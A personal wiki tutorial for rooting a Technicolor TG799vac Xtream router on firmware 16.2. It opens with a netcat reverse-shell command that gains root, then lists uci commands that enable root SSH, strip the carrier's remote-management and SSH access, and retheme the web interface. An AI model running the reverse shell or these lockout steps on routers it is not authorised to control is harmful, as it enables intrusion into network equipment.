My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream Version 16.2 Jade delivered from Technicolor
Telia users with this router model can finally unlock the router and get more features added by hacking the firmware due to an exploit missed by Technicolor developers, this hack works for all internet providers worldwide that deliver this router aslong you are using the same version as in this tutorial, Jade (16.2). Technicolor has fixed the exploit in version 17.* and above. Telia still is using version 16.2 as default so hurry up before it is to late since the router upgrading itself otherwise. In this wiki i will show how you can turn this auto-upgrade off.
Please note that if you rent your router from your carrier, you will be liable for repayment if you bricking the device. This is stated in the agreement you have with your carrier, atleast customers of Telia has done an agreement if you chosed to get the router along with the order of the internet subscription. Please check this out first if you do not want to risk paying compensation for a bricked device because there is always a risk of hacking a firmware. If you follow my guide then everything should be fine, I will not take any responsibility if you bricking your device in any way at all!!!! All users that following this wiki is hacking their device at their own risk and they have been well informed of the risks it CAN causes to hack the firmware!!
Required for this tutorial:
Of course a Thomson TG799vac-Xtreme router with a firmware that is using version 16.2.
Netcat wich is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is available for Linux and Windows, for android use termux wich providing netcat. For osx/ios i have no idea what is available because I do not care. ;)
With all that said let's start with the funny part.
nc -lvvp [machine_port]
:::::::`nc [machine_IP] [machine_port] -e /bin/sh`
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.natalghelper.roles='admin'
uci add_list web.mmpbxglobalmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
# OBS!! THIS IS A BACKDOOR > Please go whois the ip to witness it yourself
# So who have access to this machines running on this ip? Of course i asked,
# and Telia told me in a mail that **ALL** people who works for Telia Support!! **As if we can know if this is abused?**
sed -i s/'131.116.22.242'/'xx.xx.xx.xx'/g /etc/config/dropbear
OBS!! THIS IS A BACKDOOR > Please go whois the ip to witness it yourself
# This backdoor is for **ALL** people who works for Technicolor Technologies in Belgium!! **As if we can know if this is abused?**
sed -i s/'82.146.125.0'/'xx.xx.xx.xx'/g /etc/config/dropbear
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear
sed -i '21s/off/on/' /etc/config/dropbear
sed -i '24s/0/1/' /etc/config/dropbear
sed -i '25s/0/1/' /etc/config/dropbear
/etc/init.d/nginx restart
Let me provide the default view to see the difference before and after we run these commands since I know that there are people who are paranoid for changes due to root. ;) The firmware has been extremely downgraded to the worse for us consumers.
uci add_list web.ruleset_main.rules=cwmpconfmodal
uci add_list web.ruleset_main.rules=mmpbxinoutgoingmapmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci set web.iproutesmodal=rule
uci set web.cwmpconfmodal=rule
uci set web.natalghelpermodal=rule
uci set web.mmpbxstatisticsmodal=rule
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=natalghelpermodal
uci add_list web.ruleset_main.rules=diagnosticstcpdumpmodal
uci set web.diagnosticstcpdumpmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.systemmodal=rule
uci set web.relaymodal=rule
uci add_list web.parentalblock.roles=admin
uci add_list web.diagnosticstcpdumpmodal.roles=admin
uci add_list web.natalghelpermodal.roles=admin
uci add_list web.relaymodal.roles=admin
uci add_list web.cwmpconfmodal.roles=admin
uci add_list web.iproutesmodal.roles=admin
uci add_list web.systemmodal.roles=admin
uci add_list web.mmpbxstatisticsmodal.roles=admin
uci add_list web.mmpbxinoutgoingmapmodal.roles=admin
uci add_list web.xdsllowmodal.roles='admin'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.cwmpconfmodal.target='/modals/cwmpconf-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.mmpbxstatisticsmodal.target='/modals/mmpbx-statistics-modal.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'
uci set system.config.export_plaintext='1'
uci set system.config.export_unsigned='1'
uci set system.config.import_plaintext='1'
uci set system.config.import_unsigned='1'
uci set dropbear.lan.enable='1'
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set hotspotd.TLS2G.enable=0
uci set hotspotd.FON2G.enable=0
uci set hotspotd.main.ipv4=0
uci set wifi_doctor_agent.config.enabled=0
uci set cwmpd.cwmpd_config.state=0
uci set cwmpd.cwmpd_config.upgradesmanaged=0
uci set cwmpd.cwmpd_config.periodicinform_enable=0
uci set cwmpd.cwmpd_config.acs_pass='0'
uci set cwmpd.cwmpd_config.acs_user='0'
uci set tls-vsparc.Config.Enabled='0'
uci set tls-vsparc.Passive.PassiveEnabled='0'
uci set hotspotd.main.enable=false
uci set hotspotd.main.deploy=false
uci del_list xdsl.dsl0.profile='8a'
uci del_list xdsl.dsl0.profile='8b'
uci del_list xdsl.dsl0.profile='8c'
uci del_list xdsl.dsl0.profile='8d'
uci del_list xdsl.dsl0.profile='12a'
uci del_list xdsl.dsl0.profile='12b'
uci del_list xdsl.dsl0.multimode='gdmt'
uci del_list xdsl.dsl0.multimode='adsl2annexm'
uci del_list xdsl.dsl0.multimode='adsl2plus'
uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000' # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000' # 40000 default
uci set wireless.radio_2G.state='0'
uci set wireless.radio_5G.state='0'
uci show dhcp.lan.ignore='1'
uci set system.ntp.enable_server='0'
uci commit
/etc/init.d/igmpproxy stop
/etc/init.d/igmpproxy disable
uci set network.lan.dns='8.8.8.8'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'
uci commit
cat /etc/resolv.conf
uci set web.uidefault.nsplink='https://sendit.nu'
netstat -lantp | grep ESTABLISHED |awk '{print $5}' | awk -F: '{print $1}' | sort -u
uci set mobiled.globals.enabled='0'
uci set mobiled.device_defaults.enabled='0'
uci commit
/etc/init.d/mobiled stop
/etc/init.d/mobiled disable
uci set samba.samba.enabled='0'
/etc/init.d/samba stop
/etc/init.d/samba disable
/etc/init.d/samba-nmbd stop
/etc/init.d/samba-nmbd disable
uci set dlnad.config.enabled='0'
uci commit
/etc/init.d/dlnad stop
/etc/init.d/dlnad disable
cat /tmp/dhcp.leases
1534969000 macaddr lanip machine macaddr
cat /tmp/arp.log
root@OpenWrt:/tmp# cat /tmp/arp.log
IP address HW type Flags HW address Mask Device
lanip 0x1 0x2 X0:X0:X0:X0:X0:X0 * br-lan
mgmt_ip 0x1 0x2 X0:X0:X0:X0:X0:X0 * vlan_mgmt
wanip 0x1 0x2 X0:X0:X0:X0:X0:X0 * eth4
ifconfig -a | sed '/eth\|wl/!d;s/ Link.*HWaddr//
eth0 X0:X0:X0:X0:X0:X0
eth1 X0:X0:X0:X0:X0:X0
eth2 X0:X0:X0:X0:X0:X0
eth3 X0:X0:X0:X0:X0:X0
eth4 X0:X0:X0:X0:X0:X0
eth5 X0:X0:X0:X0:X0:X0
vlan_eth0 X0:X0:X0:X0:X0:X0
vlan_eth1 X0:X0:X0:X0:X0:X0
vlan_eth2 X0:X0:X0:X0:X0:X0
vlan_eth3 X0:X0:X0:X0:X0:X0
vlan_eth5 X0:X0:X0:X0:X0:X0
wl0 X0:X0:X0:X0:X0:X0
wl0_1 X0:X0:X0:X0:X0:X0
wl0_2 X0:X0:X0:X0:X0:X0
uci set system.@trafficmon[0].interface=''
uci set system.@trafficmon[0].minute=''
uci set system.@trafficmon[1].interface=''
uci set system.@trafficmon[1].minute=''
uci set system.@trafficmon[2].interface=''
uci set system.@trafficmon[2].minute=''
uci set system.@trafficmon[3]=trafficmon
uci set system.@trafficmon[3].interface=''
uci set system.@trafficmon[3].minute=''
uci set tod.global.enabled='0'
uci commit
/etc/init.d/tod stop
/etc/init.d/tod disable
http://192.168.1.1/?debug=1
mount -o remount,rw /
uci set system.@coredump[0].reboot='0'
uci commit system
opkg install wget
Installing wget (1.13.4-1) to root...
Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/brcm63xx/generic/packages//wget_1.13.4-1_brcm63xx.ipk.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Configuring wget.
strings /etc/cwmpd.db
SQLite format 3
tabletidkvtidkv
CREATE TABLE tidkv ( type TEXT NOT NULL, id TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (type, id, key)))
indexsqlite_autoindex_tidkv_1tidkv
transferPassword5
transfer Username
Stransfer URLhttp://192.168.21.52:7547/ACS-server
5transferaStartTime2018-08-19T15:20:13Z
transfera FaultStringcomplete
transfera FaultCode0M_
M%5transfera CompleteTime2018-08-19T15:19:57Z
'transfera TimeStamp244,9XXXXXX
transfera DelaySeconds3
transfera Password
transfera Username
runtimevarParameterKey#
runtimevarConfigurationVersionD
%_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
+/VersionsSoftwareVersion16.2.XXXXXX
transfer FaultString
transfer FaultCode
transfer TimeSt6
transfera UsernameU
transfera URLT7
transfera TimeStampX
transfera SubStatec
transfera Stateb7
transfera StartTimed
transfera PasswordV
...........
You can copy paste everything from below the video if you are lazy.
cat /etc/config/network | grep -A11 "interface 'lan'" # This will list current settings
config interface 'lan'
option type 'bridge'
option proto 'static'
option ipaddr '192.168.1.1'
option netmask '255.255.255.0'
option force_link '0'
option ip6hint '0'
option igmp_snooping '0'
option ipv6 '0'
option ip6assign '64'
# option ifname 'vlan_eth0 vlan_eth1 vlan_eth2 vlan_eth3 vlan_eth5'
# list pppoerelay ''
list ifname 'eth0'
list ifname 'eth1'
list ifname 'eth2'
list ifname 'wl0'
list ifname 'wl0_1'
list ifname 'wl1'
list ifname 'wk1_1'
ssh-keygen -t dsa
scp ~/.ssh/id_dsa.pub [email protected]:/tmp
cd /etc/dropbear
cat /tmp/id_*.pub >> authorized_keys
chmod 0600 authorized_keys
exit
ssh [email protected] "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub
ssh [email protected]
Then we has to edit the CSS files. I wont go though every color since its a huge job and really boring since telia using like 10 different shades on their purple color!! :-/ But as example, to change background of web interface you can copy and paste in shell:
sed -i s/'eeeeee'/'000000'/g gw.css; sed -i s/'eeeeee'/'000000'/g lte-doctor.css;
sed -i s/'eeeeee'/'000000'/g responsive.css; sed -i s/'eeeeee'/'000000'/g mobiled.css;
sed -i s/'eeeeee'/'000000'/g chosen.css
As you can see on the pictures below the background has been changed: If you want to use 'theme wuseman' on your technicolor tg799-vac xtreme router then copy & paste my commands below the previews: (or download my css files and scp them over to router)
sed -i s/'333333'/'e6e6e6'/g gw.css; sed -i s/'333333'/'e6e6e6'/g responsive.css; sed -i s/'333333'/'e6e6e6'/g lte-doctor.css;
sed -i s/'333333'/'e6e6e6'/g chosen.css; sed -i s/'333333'/'e6e6e6'/g mobiled.css; sed -i s/'990ae3'/'55aa7f'/g gw.css;
sed -i s/'990ae3'/'55aa7f'/g responsive.css; sed -i s/'990ae3'/'55aa7f'/g chosen.css; sed -i s/'990ae3'/'55aa7f'/g mobiled.css;
sed -i s/'eeeeee'/'2f5e45'/g gw.css; sed -i s/'eeeeee'/'2f5e45'/g responsive.css; sed -i s/'eeeeee'/'2f5e45'/g lte-doctor.css;
sed -i s/'eeeeee'/'2f5e45'/g chosen.css; sed -i s/'eeeeee'/'2f5e45'/g mobiled.css; sed -i s/'a70af5'/'55aa7f'/g gw.css;
sed -i s/'990ae3'/'00aa00'/g gw.css; sed -i s/'45004e'/'005100'/g gw.css; sed -i s/'4d234d'/'003e00'/g gw.css;
sed -i s/'purple'/'green'/g gw.css; sed -i s/'a70af5'/'55aa7f'/g responsive.css; sed -i s/'990ae3'/'00aa00'/g responsive.css;
sed -i s/'45004e'/'005100'/g responsive.css; sed -i s/'4d234d'/'003e00'/g responsive.css;
sed -i s/'purple'/'green'/g responsive.css; sed -i s/'purple'/'green'/g gw.css; sed -i s/'a70af5'/'55aa7f'/g lte-doctor.css;
sed -i s/'990ae3'/'00aa00'/g lte-doctor.css; sed -i s/'45004e'/'005100'/g lte-doctor.css; sed -i s/'4d234d'/'003e00'/g lte-doctor.css;
sed -i s/'purple'/'green'/g gw.css; sed -i s/'a70af5'/'55aa7f'/g chosen.css; sed -i s/'990ae3'/'00aa00'/g chosen.css;
sed -i s/'45004e'/'005100'/g chosen.css; sed -i s/'purple'/'green'/g lte-doctor.css; sed -i s/'4d234d'/'003e00'/g chosen.css;
sed -i s/'purple'/'green'/g chosen.css; sed -i s/'a70af5'/'55aa7f'/g mobiled.css; sed -i s/'990ae3'/'00aa00'/g mobiled.css;
sed -i s/'45004e'/'005100'/g mobiled.css; sed -i s/'4d234d'/'003e00'/g mobiled.css; sed -i s/'purple'/'green'/g mobiled.css;
sed -i s/'6dc56d'/'62ff00'/g gw.css; sed -i s/'6dc56d'/'62ff00'/g responsive.css; sed -i s/'6dc56d'/'62ff00'/g lte-doctor.css;
sed -i s/'6dc56d'/'62ff00'/g chosen.css; sed -i s/'6dc56d'/'62ff00'/g mobiled.css; sed -i s/'999'/'66ffe1'/g responsive.css;
sed -i s/'f5f5f5'/'183124'/g gw.css; sed -i s/'f5f5f5'/'183124'/g responsive.css; sed -i s/'f5f5f5'/'183124'/g lte-doctor.css;
sed -i s/'f5f5f5'/'183124'/g chosen.css; sed -i s/'f5f5f5'/'183124'/g mobiled.css; sed -i s/'ffffff'/'ffaa00'/g mobiled.css;
sed -i s/'aaaaaa'/'87ff66'/g gw.css; sed -i s/'aaaaaa'/'87ff66'/g responsive.css; sed -i s/'aaaaaa'/'87ff66'/g lte-doctor.css;
sed -i s/'aaaaaa'/'87ff66'/g chosen.css; sed -i s/'aaaaaa'/'87ff66'/g mobiled.css; sed -i s/'ffffff'/'ffaa00'/g gw.css;
sed -i s/'ffffff'/'ffaa00'/g responsive.css; sed -i s/'ffffff'/'ffaa00'/g lte-doctor.css; sed -i s/'ffffff'/'ffaa00'/g chosen.css;
sed -i s/'ffffff'/'ffaa00'/g gw.css; sed -i s/'ffffff'/'ffaa00'/g responsive.css; sed -i s/'ffffff'/'ffaa00'/g lte-doctor.css;
sed -i s/'ffffff'/'ffaa00'/g chosen.css; sed -i s/'ffffff'/'ffaa00'/g mobiled.css; sed -i s/'999'/'66ffe1'/g gw.css;
sed -i s/'999'/'66ffe1'/g lte-doctor.css; sed -i s/'999'/'66ffe1'/g mobiled.css; sed -i s/'ccc'/'66ffe1'/g gw.css;
sed -i s/'ccc'/'66ffe1'/g responsive.css; sed -i s/'ccc'/'66ffe1'/g lte-doctor.css; sed -i s/'ccc'/'66ffe1'/g chosen.css;
sed -i s/'ccc'/'66ffe1'/g mobiled.css; sed -i s/'ccc'/'66ffe1'/g gw.css; sed -i s/'ccc'/'66ffe1'/g responsive.css;
sed -i s/'ccc'/'66ffe1'/g lte-doctor.css; sed -i s/'ccc'/'66ffe1'/g chosen.css; sed -i s/'ccc'/'66ffe1'/g mobiled.css;
sed -i s/'d9d9d9'/'222222'/g gw.css; sed -i s/'d9d9d9'/'222222'/g responsive.css; sed -i s/'0088cc'/'#5ebe8d'/g gw.css;
sed -i s/'d9d9d9'/'222222'/g lte-doctor.css; sed -i s/'d9d9d9'/'222222'/g chosen.css; sed -i s/'0088cc'/'#5ebe8d'/g responsive.css;
sed -i s/'0088cc'/'#5ebe8d'/g lte-doctor.css; sed -i s/'0088cc'/'#5ebe8d'/g chosen.css
If you have problems, questions, ideas or suggestions please contact us by posting to [email protected]
Visit our homepage for the latest info and updated tools
https://sendit.nu & https://github.com/wuseman/